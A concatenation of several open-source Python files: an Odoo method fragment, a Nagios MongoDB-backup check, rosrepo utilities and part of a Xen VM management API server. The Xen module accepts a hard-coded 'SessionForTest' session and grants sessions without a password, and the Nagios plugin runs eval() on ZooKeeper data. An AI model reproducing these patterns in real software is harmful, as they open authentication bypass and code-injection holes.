def copy(self, cr, uid, line_id, default, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
default = default or {}
if context.get('versioning', False):
default['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy(cr, uid, line_id, default, context)
| agpl-3.0 | 2,852,159,605,738,768,400 | 43.866667 | 120 | 0.616642 | false | 3.966601 | false | false | false |
Tealium/nagios | files/default/plugins/check_mongodb_backup.py | 1 | 6143 | #!/usr/bin/env python
desc = """
Checks the status of the most recent MongoDB backup or, with the --snap option,
checks that the snapshots for the most recent backup were completed.
"""
import kazoo
from kazoo.client import KazooClient
from kazoo.client import KazooState
import yaml
import argparse
import time
from datetime import datetime
from datetime import timedelta
class Status(dict):
def __init__(self, name, code, msg):
self.name = name
self.code = code
self.msg = msg
def exit(self):
print "%s - %s" % (self.name, self.msg)
raise SystemExit(self.code)
class OK(Status):
def __init__(self,msg):
super(OK,self).__init__('OK', 0, msg)
class WARNING(Status):
def __init__(self,msg):
super(WARNING,self).__init__('WARNING', 1, msg)
class CRITICAL(Status):
def __init__(self,msg):
super(CRITICAL,self).__init__('CRITICAL', 2, msg)
class UNKNOWN(Status):
def __init__(self,msg):
super(UNKNOWN,self).__init__('UNKNOWN', 3, msg)
def state_listener(state):
if state == KazooState.LOST:
error("zookeeper connection state was lost")
elif state == KazooState.SUSPENDED:
error("zookeeper connection state was suspended")
elif state == KazooState.CONNECTED:
pass
def create_date_path(days_ago):
when = datetime.utcnow()
if days_ago:
delta = timedelta(days=days_ago)
when = when - delta
return when.strftime("/%Y/%m/%d")
def look4abort(zk, days_ago=None):
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
abort_node = day_node + '/' + str(hours[-1]) + '/ABORT'
if zk.exists(abort_node):
excuse = zk.retry(zk.get, abort_node)
return CRITICAL("found backup abort status: %s" % excuse[0])
else:
return OK('no abort during most recent backup')
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
else:
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4abort(zk, 1)
def look4snaps(zk, days_ago=None):
import boto
import boto.ec2
import boto.utils
import chef
instance_id = boto.utils.get_instance_metadata()['instance-id']
if args.region:
region_spec = args.region
else:
region_spec = boto.utils.get_instance_identity()['document']['region']
chef_api = chef.autoconfigure()
node = chef.Node(instance_id)
my_app_env = node.attributes['app_environment']
bag = chef.DataBag('aws')
item = bag[my_app_env]
key_id = str(item['aws_access_key_id'])
key_secret = str(item['aws_secret_access_key'])
region = boto.ec2.get_region(region_spec, aws_access_key_id=key_id, aws_secret_access_key=key_secret)
conn = region.connect(aws_access_key_id=key_id, aws_secret_access_key=key_secret)
day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
if zk.exists(day_node):
hours = zk.retry(zk.get_children, day_node)
if len(hours):
hours.sort()
shards_parent_node = day_node + '/' + str(hours[-1]) + '/mongodb_shard_server'
if zk.exists(shards_parent_node):
shard_list = zk.retry(zk.get_children, shards_parent_node)
if len(shard_list) > 0:
msg = ''
err = 0
for shard in shard_list:
shard_data = zk.retry(zk.get, shards_parent_node + '/' + shard)
snaps = conn.get_all_snapshots(eval(shard_data[0]))
msg = msg + ", %s [" % shard
snap_text = ''
for snap in snaps:
if snap.status == 'error': err = 1
snap_text = snap_text + ", %s (%s)" % (str(snap), snap.status)
msg = msg + snap_text.strip(', ') + ']'
if err:
return CRITICAL(msg.strip(', '))
return OK(msg.strip(', '))
# Apparently no backups yet today. Let's check yesterday.
# Let's not explore infinity though...
if days_ago: return WARNING('found no backup info for past two days')
return look4snaps(zk, 1)
if __name__ == '__main__':
gargle = argparse.ArgumentParser(prog = "check_mongodb_backup", description=desc,
usage='%(prog)s [options]',
formatter_class = argparse.RawDescriptionHelpFormatter)
gargle.add_argument('--prefix', dest="prefix", metavar="<path_prefix>", default='/backup/mongodb_cluster/',
help='ZooKeeper path prefix (default: /backup/mongodb_cluster/)')
gargle.add_argument('--cluster', dest="env", metavar="<cluster_id>", default='production',
help='MongoDB cluster name (default: production)')
gargle.add_argument('--config', dest='yaml', metavar="<config_file>",
help='ZooKeeper server list file (default: /etc/zookeeper/server_list.yml)',
default='/etc/zookeeper/server_list.yml')
gargle.add_argument('--region', metavar="<aws-region-spec>",
help='AWS region where the snapshots are stored (default: region of host instance)')
gargle.add_argument('--snaps', action='store_true',
help='check snapshots from most recent backup (default: False)')
args = gargle.parse_args()
try:
y = yaml.safe_load(open(args.yaml))
servers = ','.join("%s:%s" % (s['host'],s['port']) for s in y['zookeepers'])
zk = KazooClient(hosts=servers)
zk.start()
zk.add_listener(state_listener)
if args.snaps:
status = look4snaps(zk)
else:
status = look4abort(zk)
zk.remove_listener(state_listener)
zk.stop()
status.exit()
except Exception as e:
UNKNOWN("Error: %s" % e).exit()
| apache-2.0 | 3,951,950,523,133,966,300 | 27.178899 | 110 | 0.608335 | false | 3.480453 | false | false | false |
fkie/rosrepo | src/rosrepo/util.py | 1 | 6206 | # coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import fcntl
import termios
import struct
import multiprocessing
import signal
from tempfile import mkstemp
from subprocess import Popen, PIPE
from yaml import load as yaml_load_impl, dump as yaml_dump_impl, YAMLError
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
def yaml_load(stream, Loader=SafeLoader):
return yaml_load_impl(stream, Loader=Loader)
def yaml_dump(data, stream=None, Dumper=SafeDumper, **kwargs):
return yaml_dump_impl(data, stream=stream, Dumper=Dumper, **kwargs)
class NamedTuple(object):
__slots__ = ()
def __init__(self, *args, **kwargs):
slots = self.__slots__
for k in slots:
setattr(self, k, kwargs.get(k))
if args:
for k, v in zip(slots, args):
setattr(self, k, v)
def __str__(self):
clsname = self.__class__.__name__
values = ", ".join("%s=%r" % (k, getattr(self, k)) for k in self.__slots__)
return "%s(%s)" % (clsname, values)
__repr__ = __str__
def __getitem__(self, item):
return getattr(self, self.__slots__[item])
def __setitem__(self, item, value):
return setattr(self, self.__slots__[item], value)
def __len__(self):
return len(self.__slots__)
try:
iteritems = dict.iteritems
except AttributeError:
iteritems = dict.items
class UserError(RuntimeError):
pass
def is_deprecated_package(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated is not None
def deprecated_package_info(manifest):
deprecated = next((e for e in manifest.exports if e.tagname == "deprecated"), None)
return deprecated.content if deprecated is not None else None
def path_has_prefix(path, prefix):
p = os.path.normpath(path)
q = os.path.normpath(prefix)
if p == q:
return True
head, tail = os.path.split(p)
while tail != "":
if head == q:
return True
head, tail = os.path.split(head)
return False
def has_package_path(obj, paths):
for path in paths:
if path_has_prefix(path, obj.workspace_path if hasattr(obj, "workspace_path") else obj):
return True
return False
def env_path_list_contains(path_list, path):
if path_list not in os.environ:
return False
paths = os.environ[path_list].split(os.pathsep)
return path in paths
def makedirs(path):
if not os.path.isdir(path):
os.makedirs(path)
def write_atomic(filepath, data, mode=0o644, ignore_fail=False):
try:
fd, filepath_tmp = mkstemp(prefix=os.path.basename(filepath) + ".tmp.", dir=os.path.dirname(filepath))
os.fchmod(fd, mode)
with os.fdopen(fd, "wb") as f:
f.write(data)
os.rename(filepath_tmp, filepath)
except (IOError, OSError):
if not ignore_fail:
raise
def isatty(fd):
return hasattr(fd, "isatty") and fd.isatty()
_cached_terminal_size = None
def get_terminal_size():
global _cached_terminal_size
if _cached_terminal_size is not None:
return _cached_terminal_size
try:
with open(os.ctermid(), "rb") as f:
cr = struct.unpack('hh', fcntl.ioctl(f.fileno(), termios.TIOCGWINSZ, '1234'))
except (IOError, struct.error):
raise OSError("Cannot determine terminal size")
_cached_terminal_size = int(cr[1]), int(cr[0])
return _cached_terminal_size
def find_program(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
fpath = path.strip('"')
candidate = os.path.join(fpath, fname)
if is_exe(candidate):
return candidate
return None
def getmtime(path):
return os.path.getmtime(path) if os.path.exists(path) else 0
def call_process(args, bufsize=0, stdin=None, stdout=None, stderr=None, cwd=None, env=None, input_data=None):
p = Popen(args, bufsize=bufsize, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd, env=env)
if stdin == PIPE or stdout == PIPE or stderr == PIPE:
stdoutdata, stderrdata = p.communicate(input_data.encode("UTF-8") if input_data else None)
return p.returncode, stdoutdata.decode("UTF-8") if stdoutdata is not None else None, stderrdata.decode("UTF-8") if stderrdata is not None else None
else:
p.wait()
return p.returncode
def create_multiprocess_manager():
return multiprocessing.Manager()
def _worker_init(worker_init, worker_init_args):
signal.signal(signal.SIGINT, signal.SIG_IGN)
if worker_init is not None:
worker_init(*worker_init_args)
def run_multiprocess_workers(worker, workload, worker_init=None, worker_init_args=(), jobs=None, timeout=None):
if not workload:
return []
if timeout is None:
timeout = 999999999 # Workaround for KeyboardInterrupt
pool = multiprocessing.Pool(processes=jobs, initializer=_worker_init, initargs=(worker_init, worker_init_args))
try:
result_obj = pool.map_async(worker, workload)
pool.close()
result = result_obj.get(timeout=timeout)
return result
except:
pool.terminate()
raise
finally:
pool.join()
| apache-2.0 | 8,527,631,097,278,525,000 | 28.131455 | 155 | 0.652538 | false | 3.645711 | false | false | false |
Hearen/OnceServer | pool_management/bn-xend-core/xend/BNVMAPI.py | 1 | 374814 | import traceback
import inspect
import os
import Queue
import string
import sys
import threading
import time
import xmlrpclib
import socket
import struct
import copy
import re
import XendDomain, XendDomainInfo, XendNode, XendDmesg, XendConfig
import XendLogging, XendTaskManager, XendAPIStore, XendIOController
from xen.xend.BNPoolAPI import BNPoolAPI
from xen.util.xmlrpcclient import ServerProxy
from xen.xend import uuid as genuuid
from XendLogging import log
from XendNetwork import XendNetwork
from XendError import *
from XendTask import XendTask
from xen.util import ip as getip
from xen.util import Netctl
from xen.xend import sxp
from xen.xend.XendCPUPool import XendCPUPool
from XendAuthSessions import instance as auth_manager
from xen.util.xmlrpclib2 import stringify
from xen.util import xsconstants
from xen.util.xpopen import xPopen3
from xen.xend.XendConstants import DOM_STATE_HALTED, DOM_STATE_PAUSED
from xen.xend.XendConstants import DOM_STATE_RUNNING, DOM_STATE_SUSPENDED
from xen.xend.XendConstants import DOM_STATE_SHUTDOWN, DOM_STATE_UNKNOWN
from xen.xend.XendConstants import DOM_STATE_CRASHED, HVM_PARAM_ACPI_S_STATE
from xen.xend.XendConstants import VDI_DEFAULT_STRUCT, VDI_DEFAULT_SR_TYPE, VDI_DEFAULT_DIR
from xen.xend.XendConstants import FAKE_MEDIA_PATH, FAKE_MEDIA_NAME
from xen.xend.XendConstants import CD_VBD_DEFAULT_STRUCT, DEFAULT_HA_PATH
from xen.xend.XendConstants import CACHED_CONFIG_FILE
from XendAPIConstants import *
from xen.xend.ConfigUtil import getConfigVar
GB = 1024 * 1024 * 1024
if getConfigVar('compute', 'VM', 'disk_limit'):
DISK_LIMIT = int(getConfigVar('compute', 'VM', 'disk_limit'))
else:
DISK_LIMIT = 6
if getConfigVar('compute', 'VM', 'interface_limit'):
INTERFACE_LIMIT = int(getConfigVar('compute', 'VM', 'interface_limit'))
else:
INTERFACE_LIMIT = 6
if getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb'):
RESERVED_MEM = int(getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb')) * GB
else:
RESERVED_MEM = 4 * GB
try:
set
except NameError:
from sets import Set as set
reload(sys)
sys.setdefaultencoding( "utf-8" )
DOM0_UUID = "00000000-0000-0000-0000-000000000000"
argcounts = {}
def doexec(args, inputtext=None):
"""Execute a subprocess, then return its return code, stdout and stderr"""
proc = xPopen3(args, True)
if inputtext != None:
proc.tochild.write(inputtext)
stdout = proc.fromchild
stderr = proc.childerr
rc = proc.wait()
return (rc, stdout, stderr)
# ------------------------------------------
# Utility Methods for Xen API Implementation
# ------------------------------------------
def xen_api_success(value):
"""Wraps a return value in XenAPI format."""
if value is None:
s = ''
else:
s = stringify(value)
return {"Status": "Success", "Value": s}
def xen_api_success_void():
"""Return success, but caller expects no return value."""
return xen_api_success("")
def xen_api_error(error):
"""Wraps an error value in XenAPI format."""
if type(error) == tuple:
error = list(error)
if type(error) != list:
error = [error]
if len(error) == 0:
error = ['INTERNAL_ERROR', 'Empty list given to xen_api_error']
return { "Status": "Failure",
"ErrorDescription": [str(x) for x in error] }
def xen_rpc_call(ip, method, *args):
"""wrap rpc call to a remote host"""
try:
if not ip:
return xen_api_error("Invalid ip for rpc call")
# create
proxy = ServerProxy("http://" + ip + ":9363/")
# login
response = proxy.session.login('root')
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
session_ref = response['Value']
# excute
method_parts = method.split('_')
method_class = method_parts[0]
method_name = '_'.join(method_parts[1:])
if method.find("host_metrics") == 0:
method_class = "host_metrics"
method_name = '_'.join(method_parts[2:])
#log.debug(method_class)
#log.debug(method_name)
if method_class.find("Async") == 0:
method_class = method_class.split(".")[1]
response = proxy.__getattr__("Async").__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
else:
response = proxy.__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
# result
return response
except socket.error:
return xen_api_error('socket error')
def xen_api_todo():
"""Temporary method to make sure we track down all the TODOs"""
return {"Status": "Error", "ErrorDescription": XEND_ERROR_TODO}
def now():
return datetime()
def datetime(when = None):
"""Marshall the given time as a Xen-API DateTime.
@param when The time in question, given as seconds since the epoch, UTC.
May be None, in which case the current time is used.
"""
if when is None:
return xmlrpclib.DateTime(time.gmtime())
else:
return xmlrpclib.DateTime(time.gmtime(when))
# -----------------------------
# Bridge to Legacy XM API calls
# -----------------------------
def do_vm_func(fn_name, vm_ref, *args, **kwargs):
"""Helper wrapper func to abstract away from repetitive code.
@param fn_name: function name for XendDomain instance
@type fn_name: string
@param vm_ref: vm_ref
@type vm_ref: string
@param *args: more arguments
@type *args: tuple
"""
try:
xendom = XendDomain.instance()
fn = getattr(xendom, fn_name)
xendom.do_legacy_api_with_uuid(fn, vm_ref, *args, **kwargs)
return xen_api_success_void()
except VMBadState, exn:
return xen_api_error(['VM_BAD_POWER_STATE', vm_ref, exn.expected,
exn.actual])
# ---------------------------------------------------
# Event dispatch
# ---------------------------------------------------
EVENT_QUEUE_LENGTH = 50
event_registrations = {}
def event_register(session, reg_classes):
if session not in event_registrations:
event_registrations[session] = {
'classes' : set(),
'queue' : Queue.Queue(EVENT_QUEUE_LENGTH),
'next-id' : 1
}
if not reg_classes:
reg_classes = classes
sessionclasses = event_registrations[session]['classes']
if hasattr(sessionclasses, 'union_update'):
sessionclasses.union_update(reg_classes)
else:
sessionclasses.update(reg_classes)
def event_unregister(session, unreg_classes):
if session not in event_registrations:
return
if unreg_classes:
event_registrations[session]['classes'].intersection_update(
unreg_classes)
if len(event_registrations[session]['classes']) == 0:
del event_registrations[session]
else:
del event_registrations[session]
def event_next(session):
if session not in event_registrations:
return xen_api_error(['SESSION_NOT_REGISTERED', session])
queue = event_registrations[session]['queue']
events = [queue.get()]
try:
while True:
events.append(queue.get(False))
except Queue.Empty:
pass
return xen_api_success(events)
def _ctor_event_dispatch(xenapi, ctor, api_cls, session, args):
result = ctor(xenapi, session, *args)
if result['Status'] == 'Success':
ref = result['Value']
event_dispatch('add', api_cls, ref, '')
return result
def _dtor_event_dispatch(xenapi, dtor, api_cls, session, ref, args):
result = dtor(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('del', api_cls, ref, '')
return result
def _setter_event_dispatch(xenapi, setter, api_cls, attr_name, session, ref,
args):
result = setter(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('mod', api_cls, ref, attr_name)
return result
def event_dispatch(operation, api_cls, ref, attr_name):
assert operation in ['add', 'del', 'mod']
event = {
'timestamp' : now(),
'class' : api_cls,
'operation' : operation,
'ref' : ref,
'obj_uuid' : ref,
'field' : attr_name,
}
for reg in event_registrations.values():
if api_cls in reg['classes']:
event['id'] = reg['next-id']
reg['next-id'] += 1
reg['queue'].put(event)
# ---------------------------------------------------
# Python Method Decorators for input value validation
# ---------------------------------------------------
def trace(func, api_name=''):
"""Decorator to trace XMLRPC Xen API methods.
@param func: function with any parameters
@param api_name: name of the api call for debugging.
"""
if hasattr(func, 'api'):
api_name = func.api
def trace_func(self, *args, **kwargs):
log.debug('%s: %s' % (api_name, args))
return func(self, *args, **kwargs)
trace_func.api = api_name
return trace_func
def catch_typeerror(func):
"""Decorator to catch any TypeErrors and translate them into Xen-API
errors.
@param func: function with params: (self, ...)
@rtype: callable object
"""
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except TypeError, exn:
#log.exception('catch_typeerror')
if hasattr(func, 'api') and func.api in argcounts:
# Assume that if the argument count was wrong and if the
# exception was thrown inside this file, then it is due to an
# invalid call from the client, otherwise it's an internal
# error (which will be handled further up).
expected = argcounts[func.api]
actual = len(args) + len(kwargs)
if expected != actual:
tb = sys.exc_info()[2]
try:
sourcefile = traceback.extract_tb(tb)[-1][0]
if sourcefile == inspect.getsourcefile(BNVMAPI):
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
func.api, expected, actual])
finally:
del tb
raise
except XendAPIError, exn:
return xen_api_error(exn.get_api_error())
return f
def session_required(func):
"""Decorator to verify if session is valid before calling method.
@param func: function with params: (self, session, ...)
@rtype: callable object
"""
def check_session(self, session, *args, **kwargs):
if auth_manager().is_session_valid(session) or cmp(session, "SessionForTest") == 0:
return func(self, session, *args, **kwargs)
else:
return xen_api_error(['SESSION_INVALID', session])
return check_session
def _is_valid_ref(ref, validator):
return type(ref) == str and validator(ref)
def _check_ref(validator, clas, func, api, session, ref, *args, **kwargs):
# if _is_valid_ref(ref, validator):
return func(api, session, ref, *args, **kwargs)
# else:
# return xen_api_error(['HANDLE_INVALID', clas, ref])
def _check_vm(validator, clas, func, api, session, ref, *args, **kwargs):
# for host_ref in BNPoolAPI._host_structs.keys():
# if BNPoolAPI._host_structs[host_ref]['VMs'].has_key(ref):
if BNPoolAPI.check_vm(ref):
return func(api, session, ref, *args, **kwargs)
return xen_api_error(['VM_NOT_FOUND', clas, ref])
def _check_console(validator, clas, func, api, session, ref, *args, **kwargs):
#if BNPoolAPI._consoles_to_VM.has_key(ref):
return func(api, session, ref, *args, **kwargs)
#else:
return xen_api_error(['HANDLE_INVALID', clas, ref])
def valid_object(class_name):
"""Decorator to verify if object is valid before calling
method.
@param func: function with params: (self, session, pif_ref)
@rtype: callable object
"""
return lambda func: \
lambda *args, **kwargs: \
_check_ref(lambda r: \
XendAPIStore.get(r, class_name) is not None,
class_name, func, *args, **kwargs)
def valid_task(func):
"""Decorator to verify if task_ref is valid before calling
method.
@param func: function with params: (self, session, task_ref)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(XendTaskManager.get_task,
'task', func, *args, **kwargs)
def valid_vm(func):
"""Decorator to verify if vm_ref is valid before calling method.
@param func: function with params: (self, session, vm_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_vm(XendDomain.instance().is_valid_vm,
'VM', func, *args, **kwargs)
def valid_vbd(func):
"""Decorator to verify if vbd_ref is valid before calling method.
@param func: function with params: (self, session, vbd_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD', func, *args, **kwargs)
def valid_vbd_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD_metrics', func, *args, **kwargs)
def valid_vif(func):
"""Decorator to verify if vif_ref is valid before calling method.
@param func: function with params: (self, session, vif_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF', func, *args, **kwargs)
def valid_vif_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF_metrics', func, *args, **kwargs)
def valid_console(func):
"""Decorator to verify if console_ref is valid before calling method.
@param func: function with params: (self, session, console_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_console(lambda r: XendDomain.instance().is_valid_dev('console',
r),
'console', func, *args, **kwargs)
classes = {
'session' : None,
'VM' : valid_vm,
'VBD' : valid_vbd,
'VBD_metrics' : valid_vbd_metrics,
'VIF' : valid_vif,
'VIF_metrics' : valid_vif_metrics,
'console' : valid_console,
'task' : valid_task,
}
def singleton(cls, *args, **kw):
instances = {}
def _singleton(*args, **kw):
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class BNVMAPI(object):
__decorated__ = False
__init_lock__ = threading.Lock()
__vm_clone_lock__ = threading.Lock()
__vm_change_host_lock__ = threading.Lock()
__set_passwd_lock__ = threading.Lock()
__vbd_lock__ = threading.Lock()
def __new__(cls, *args, **kwds):
""" Override __new__ to decorate the class only once.
Lock to make sure the classes are not decorated twice.
"""
cls.__init_lock__.acquire()
try:
if not cls.__decorated__:
cls._decorate()
cls.__decorated__ = True
return object.__new__(cls, *args, **kwds)
finally:
cls.__init_lock__.release()
def _decorate(cls):
""" Decorate all the object methods to have validators
and appropriate function attributes.
This should only be executed once for the duration of the
server.
"""
global_validators = [session_required, catch_typeerror]
# Cheat methods _hosts_name_label
# -------------
# Methods that have a trivial implementation for all classes.
# 1. get_by_uuid == getting by ref, so just return uuid for
# all get_by_uuid() methods.
for api_cls in classes.keys():
# We'll let the autoplug classes implement these functions
# themselves - its much cleaner to do it in the base class
get_by_uuid = '%s_get_by_uuid' % api_cls
get_uuid = '%s_get_uuid' % api_cls
get_all_records = '%s_get_all_records' % api_cls
def _get_by_uuid(_1, _2, ref):
return xen_api_success(ref)
def _get_uuid(_1, _2, ref):
return xen_api_success(ref)
def unpack(v):
return v.get('Value')
def _get_all_records(_api_cls):
return lambda s, session: \
xen_api_success(dict([(ref, unpack(getattr(cls, '%s_get_record' % _api_cls)(s, session, ref)))\
for ref in unpack(getattr(cls, '%s_get_all' % _api_cls)(s, session))]))
setattr(cls, get_by_uuid, _get_by_uuid)
setattr(cls, get_uuid, _get_uuid)
setattr(cls, get_all_records, _get_all_records(api_cls))
# Autoplugging classes
# --------------------
# These have all of their methods grabbed out from the implementation
# class, and wrapped up to be compatible with the Xen-API.
def getter(ref, type):
return XendAPIStore.get(ref, type)
def wrap_method(name, new_f):
try:
f = getattr(cls, name)
wrapped_f = (lambda * args: new_f(f, *args))
wrapped_f.api = f.api
wrapped_f.async = f.async
setattr(cls, name, wrapped_f)
except AttributeError:
# Logged below (API call: %s not found)
pass
def setter_event_wrapper(api_cls, attr_name):
setter_name = '%s_set_%s' % (api_cls, attr_name)
wrap_method(
setter_name,
lambda setter, s, session, ref, *args:
_setter_event_dispatch(s, setter, api_cls, attr_name,
session, ref, args))
def ctor_event_wrapper(api_cls):
ctor_name = '%s_create' % api_cls
wrap_method(
ctor_name,
lambda ctor, s, session, *args:
_ctor_event_dispatch(s, ctor, api_cls, session, args))
def dtor_event_wrapper(api_cls):
dtor_name = '%s_destroy' % api_cls
wrap_method(
dtor_name,
lambda dtor, s, session, ref, *args:
_dtor_event_dispatch(s, dtor, api_cls, session, ref, args))
# Wrapping validators around XMLRPC calls
# ---------------------------------------
for api_cls, validator in classes.items():
def doit(n, takes_instance, async_support=False,
return_type=None):
n_ = n.replace('.', '_')
try:
f = getattr(cls, n_)
if n not in argcounts:
argcounts[n] = f.func_code.co_argcount - 1
validators = takes_instance and validator and \
[validator] or []
validators += global_validators
for v in validators:
f = v(f)
f.api = n
f.async = async_support
if return_type:
f.return_type = return_type
setattr(cls, n_, f)
except AttributeError:
log.warn("API call: %s not found" % n)
ro_attrs = getattr(cls, '%s_attr_ro' % api_cls, []) \
+ cls.Base_attr_ro
rw_attrs = getattr(cls, '%s_attr_rw' % api_cls, []) \
+ cls.Base_attr_rw
methods = getattr(cls, '%s_methods' % api_cls, []) \
+ cls.Base_methods
funcs = getattr(cls, '%s_funcs' % api_cls, []) \
+ cls.Base_funcs
# wrap validators around readable class attributes
for attr_name in ro_attrs + rw_attrs:
doit('%s.get_%s' % (api_cls, attr_name), True,
async_support=False)
# wrap validators around writable class attrributes
for attr_name in rw_attrs:
doit('%s.set_%s' % (api_cls, attr_name), True,
async_support=False)
setter_event_wrapper(api_cls, attr_name)
# wrap validators around methods
for method_name, return_type in methods:
doit('%s.%s' % (api_cls, method_name), True,
async_support=True)
# wrap validators around class functions
for func_name, return_type in funcs:
doit('%s.%s' % (api_cls, func_name), False,
async_support=True,
return_type=return_type)
ctor_event_wrapper(api_cls)
dtor_event_wrapper(api_cls)
_decorate = classmethod(_decorate)
def __init__(self, auth):
self.auth = auth
Base_attr_ro = ['uuid']
Base_attr_rw = ['name_label', 'name_description']
Base_methods = [('get_record', 'Struct')]
Base_funcs = [('get_all', 'Set'), ('get_by_uuid', None), ('get_all_records', 'Set')]
def _get_XendAPI_instance(self):
import XendAPI
return XendAPI.instance()
def _get_BNStorageAPI_instance(self):
import BNStorageAPI
return BNStorageAPI.instance()
# Xen API: Class Session
# ----------------------------------------------------------------
# NOTE: Left unwrapped by __init__
session_attr_ro = ['this_host', 'this_user', 'last_active']
session_methods = [('logout', None)]
def session_get_all(self, session):
return xen_api_success([session])
def session_login(self, username):
try:
session = auth_manager().login_unconditionally(username)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login.api = 'session.login'
def session_login_with_password(self, *args):
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
if len(args) < 2:
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
'session.login_with_password', 2, len(args)])
username = args[0]
password = args[1]
try:
# session = ((self.auth == AUTH_NONE and
# auth_manager().login_unconditionally(username)) or
# auth_manager().login_with_password(username, password))
session = auth_manager().login_with_password(username, password)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login_with_password.api = 'session.login_with_password'
# object methods
def session_logout(self, session):
auth_manager().logout(session)
return xen_api_success_void()
def session_get_record(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
record = {'uuid' : session,
'this_host' : XendNode.instance().uuid,
'this_user' : auth_manager().get_user(session),
'last_active': now()}
return xen_api_success(record)
def session_get_uuid(self, session, self_session):
return xen_api_success(self_session)
def session_get_by_uuid(self, session, self_session):
return xen_api_success(self_session)
# attributes (ro)
def session_get_this_host(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
return xen_api_success(XendNode.instance().uuid)
def session_get_this_user(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
user = auth_manager().get_user(session)
if user is not None:
return xen_api_success(user)
return xen_api_error(['SESSION_INVALID', session])
def session_get_last_active(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
return xen_api_success(now())
# Xen API: Class User
# ----------------------------------------------------------------
# Xen API: Class Tasks
# ----------------------------------------------------------------
task_attr_ro = ['name_label',
'name_description',
'status',
'progress',
'type',
'result',
'error_info',
'allowed_operations',
'session'
]
task_attr_rw = []
task_funcs = [('get_by_name_label', 'Set(task)'),
('cancel', None)]
def task_get_name_label(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_label)
def task_get_name_description(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_description)
def task_get_status(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.get_status())
def task_get_progress(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.progress)
def task_get_type(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.type)
def task_get_result(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.result)
def task_get_error_info(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.error_info)
def task_get_allowed_operations(self, session, task_ref):
return xen_api_success({})
def task_get_session(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.session)
def task_get_all(self, session):
tasks = XendTaskManager.get_all_tasks()
return xen_api_success(tasks)
def task_get_record(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
